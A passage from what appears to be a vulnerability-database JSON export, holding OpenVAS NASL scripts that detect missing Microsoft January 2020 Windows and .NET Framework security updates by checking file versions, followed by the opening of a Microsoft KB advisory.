Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552940/kb4552940\n ## https://support.microsoft.com/en-us/help/4552920/kb4552920\n ## https://support.microsoft.com/en-us/help/4552919/kb4552919\n ## https://support.microsoft.com/en-us/help/4552921/kb4552921\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36626\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552940/kb4552940\n ## https://support.microsoft.com/en-us/help/4552920/kb4552920\n ## https://support.microsoft.com/en-us/help/4552919/kb4552919\n ## https://support.microsoft.com/en-us/help/4552921/kb4552921\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36626\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552940/kb4552940\n ## https://support.microsoft.com/en-us/help/4552920/kb4552920\n ## https://support.microsoft.com/en-us/help/4552919/kb4552919\n ## https://support.microsoft.com/en-us/help/4552921/kb4552921\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36626\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:31", "description": "This host is missing a critical security\n update according to Microsoft KB4534306", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815745", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815745", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815745\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0614\",\n \"CVE-2020-0613\", \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\",\n \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\",\n \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\",\n \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\",\n \"CVE-2020-0646\", \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:03:19 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534306)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534306\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in memory.\n\n - Microsoft Cryptographic Services improperly handles files.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Windows Common Log File System (CLFS) driver improperly handles objects\n in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privilges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534306\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18452\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18452\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:58", "description": "This host is missing a critical security\n update according to Microsoft KB4534293", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534293)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815744", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815744", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815744\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\", \"CVE-2020-0646\",\n \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:01:33 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534293)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534293\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges, disclose\n sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please\n see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534293\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1245\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1245\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:56", "description": "This host is missing a critical security\n update according to Microsoft KB4534276", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534276)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815740", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815740\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0640\", \"CVE-2020-0605\",\n \"CVE-2020-0646\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:48:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534276)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534276\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Windows Common Log File System (CLFS) driver fails to properly handle\n objects in memory.\n\n - Windows Search Indexer handles objects in memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges,\n disclose sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534276\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1624\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1624\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:32", "description": "This host is missing a critical security\n update according to Microsoft KB4534271", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534271)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0609", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0612", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815742", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815742\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0612\", \"CVE-2020-0615\",\n \"CVE-2020-0617\", \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0609\",\n \"CVE-2020-0610\", \"CVE-2020-0611\", \"CVE-2020-0614\", \"CVE-2020-0613\",\n \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\", \"CVE-2020-0626\",\n \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\", \"CVE-2020-0630\",\n \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0633\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0637\", \"CVE-2020-0639\", \"CVE-2020-0644\",\n \"CVE-2020-0641\", \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\",\n \"CVE-2020-0646\", \"CVE-2020-0640\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:57:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534271)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534271\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - win32k component improperly provides kernel information.\n\n - Microsoft Windows Graphics Component improperly handles objects in\n memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Remote Desktop Web Access improperly handles credential information.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privilges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534271\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3442\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3442\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-12-31T15:38:56", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo 